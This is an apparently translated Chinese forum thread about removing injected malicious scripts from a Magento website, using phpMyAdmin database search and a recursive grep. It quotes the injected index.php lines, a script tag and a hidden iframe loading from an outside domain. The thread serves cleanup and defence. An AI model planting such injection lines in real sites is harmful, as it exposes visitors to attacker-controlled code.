只要知道腳本的名稱是什麼,就很容易擺脫這些惡意腳本。
我有很多這些腳本注入我的網站,其中大多數是腳本和iframe指向域http://siteverification.online
。
我不是一個Magento的專家,但我想,那麼只能來自兩個地方:
- 數據庫
- 文件系統(HTML模板或PHP文件)
對於數據庫,我使用MySQL,並且因爲我安裝了PhpMyAdmin,所以我利用它的Search函數,該函數可以搜索數據庫所有表的所有字段。我剛剛搜索了siteverification.online
,發現了一些條目,並將其刪除。
對於文件系統,我登錄通過SSH,只是搜索整個網站的Magento文件系統,就像這樣:
$ grep -r "siteverification.online" /var/www/magento-project
./index.php:print('<script type="text/javascript" src="http://siteverification.online/lib/status.js"></script>');
./index.php:print('<iframe src="http://siteverification.online/" frameborder="0" width="0" height="0"></iframe>');
對我來說,事實證明,一些PHP代碼在index.php
注入。但是如果代碼被注入到任何其他的php或html文件中,這將會發現它們,因爲搜索是遞歸的(-r
標誌)。
就是這樣。我甚至都不瞭解Magento的文件系統和數據庫結構,但是使用這些激進的搜索方法,我在幾分鐘內擺脫了所有的惡意軟件。
你是否在其他代碼中檢查過它?在管理面板中? –
雜項HTML位於'system-> configuration-> design-> footer-> Miscellaneous'下的雜項HTML'檢查這可能是'code/virus' located there –